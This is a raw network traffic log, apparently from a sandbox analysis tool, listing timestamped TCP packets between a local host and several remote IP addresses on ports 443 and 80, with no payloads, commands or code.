                                                                                                                                                                Nov 23, 2024 20:36:33.927828074 CET4434977487.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:33.928020954 CET4434977487.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:33.928201914 CET49774443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:33.928201914 CET49774443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:33.928256989 CET4434977487.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:33.928324938 CET49774443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:36.882080078 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:36.882213116 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:36.882324934 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:36.882831097 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:36.882860899 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:37.211536884 CET49776443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:36:37.211590052 CET4434977620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:37.211659908 CET49776443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:36:37.211977005 CET49776443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:36:37.211992025 CET4434977620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:38.684463024 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:38.684631109 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:38.688646078 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:38.688661098 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:38.689064980 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:38.696949005 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:38.743335962 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:38.903063059 CET4434977620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:38.903175116 CET49776443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:36:38.905076981 CET49776443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:36:38.905085087 CET4434977620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:38.905407906 CET4434977620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:38.914257050 CET49776443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:36:38.955338955 CET4434977620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.207200050 CET49777443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:39.207247019 CET4434977787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.210815907 CET49777443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:39.211102962 CET49777443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:39.211121082 CET4434977787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.238626957 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.238684893 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.238765001 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.238773108 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.238845110 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.238883972 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.238913059 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.432900906 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.432957888 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.433016062 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.433084011 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.433124065 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.433149099 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.479290009 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.479365110 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.479407072 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.479475975 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.479521036 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.479563951 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.583347082 CET4434977620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.583420992 CET4434977620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.583467960 CET4434977620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.583515882 CET49776443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:36:39.583540916 CET4434977620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.583564043 CET49776443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:36:39.583599091 CET49776443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:36:39.666984081 CET4434977620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.667052031 CET4434977620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.667088032 CET49776443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:36:39.667108059 CET4434977620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.667141914 CET49776443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:36:39.667229891 CET4434977620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.667293072 CET49776443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:36:39.667323112 CET49776443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:36:39.667335033 CET4434977620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.667346954 CET49776443192.168.2.420.12.23.50
                                                                                                                                                                Nov 23, 2024 20:36:39.667351961 CET4434977620.12.23.50192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.678522110 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.678612947 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.678634882 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.678700924 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.678742886 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.678767920 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.714989901 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.715017080 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.715078115 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.715096951 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.715123892 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.715142965 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.751494884 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.751544952 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.751590014 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.751614094 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.751641989 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.751660109 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.788070917 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.788119078 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.788192034 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.788208008 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.788255930 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.788255930 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.832808971 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.832861900 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.832922935 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.832942963 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.832971096 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.832988977 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.874572039 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.874619961 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.874677896 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.874691963 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.874727011 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.874747038 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.907763004 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.907788038 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.907936096 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.907953024 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.908010960 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.929167986 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.929215908 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.929265022 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.929277897 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.929311991 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.929332018 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.942868948 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.942914963 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.942965031 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.942977905 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.943027973 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.943028927 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.953896046 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.953941107 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.953994989 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.954008102 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.954035044 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.954054117 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.957220078 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.958276987 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.958367109 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.958381891 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.958420038 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.958425045 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.958446026 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.958497047 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:39.958499908 CET49775443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:39.958532095 CET4434977513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:40.028718948 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:40.028805971 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:40.028892994 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:40.029546976 CET49779443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:40.029653072 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:40.029728889 CET49779443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:40.030448914 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:40.030524015 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:40.030596018 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:40.032546043 CET49781443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:40.032586098 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:40.032639980 CET49781443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:40.032860994 CET49781443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:40.032871008 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:40.032872915 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:40.032907009 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:40.032934904 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:40.032953024 CET49779443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:40.032959938 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:40.032987118 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:40.033030033 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:40.033030033 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:40.033092022 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:40.033114910 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:40.033128023 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.048564911 CET4434977787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.049082994 CET49777443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:41.049097061 CET4434977787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.049566984 CET4434977787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.049882889 CET49777443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:41.049957991 CET4434977787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.050112963 CET49777443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:41.095329046 CET4434977787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.693550110 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.694153070 CET49781443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:41.694175005 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.694648027 CET49781443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:41.694652081 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.708592892 CET4434977787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.708781958 CET49777443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:41.708798885 CET4434977787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.708825111 CET4434977787.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.708868980 CET49777443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:41.708899021 CET49777443192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:41.733782053 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.734309912 CET49779443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:41.734374046 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.734702110 CET49779443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:41.734715939 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.927017927 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.927443981 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:41.927468061 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.927815914 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:41.927824020 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.944751024 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.945099115 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:41.945116997 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.945497990 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:41.945503950 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.967216015 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.967648029 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:41.967710018 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:41.968378067 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:41.968394995 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.134864092 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.135013103 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.135113001 CET49781443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.135354996 CET49781443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.135354996 CET49781443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.135374069 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.135381937 CET4434978113.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.138346910 CET49784443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.138377905 CET4434978413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.138463020 CET49784443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.138595104 CET49784443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.138602972 CET4434978413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.180473089 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.180644989 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.180712938 CET49779443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.182013035 CET49779443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.182044983 CET4434977913.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.186702967 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.186790943 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.186871052 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.187283993 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.187333107 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.252034903 CET4974880192.168.2.487.120.114.172
                                                                                                                                                                Nov 23, 2024 20:36:42.377309084 CET804974887.120.114.172192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.377624989 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.377651930 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.377743006 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.377800941 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.377866030 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.384044886 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.384090900 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.384149075 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.386603117 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.386603117 CET49780443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.386635065 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.386672020 CET4434978013.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.394785881 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.394804955 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.394881010 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.394900084 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.395605087 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.395665884 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.419821024 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.419899940 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.419970036 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.420017004 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.420068979 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.423399925 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.423505068 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.423559904 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.448831081 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.448837996 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.448849916 CET49782443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.448856115 CET4434978213.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.462297916 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.462322950 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.462383032 CET49778443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.462400913 CET4434977813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.474374056 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.474387884 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.474442959 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.475193024 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.475214958 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.475251913 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.475296974 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.475383997 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.475388050 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.475390911 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.475400925 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.475487947 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.475517035 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:42.475563049 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:42.475591898 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:43.930954933 CET4434978413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:43.931530952 CET49784443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:43.931534052 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:43.931570053 CET4434978413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:43.931935072 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:43.931969881 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:43.932014942 CET49784443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:43.932022095 CET4434978413.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:43.932801962 CET49785443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:43.932809114 CET4434978513.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:44.199158907 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:44.199712038 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:44.199739933 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:44.200480938 CET49786443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:44.200486898 CET4434978613.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:44.209608078 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:44.209979057 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:44.210052967 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:44.210700035 CET49788443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:44.210716009 CET4434978813.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:44.343734026 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:44.345237017 CET49787443192.168.2.413.107.246.63
                                                                                                                                                                Nov 23, 2024 20:36:44.345283031 CET4434978713.107.246.63192.168.2.4
                                                                                                                                                                Nov 23, 2024 20:36:44.345859051 CET49787443192.168.2.413.107.246.63
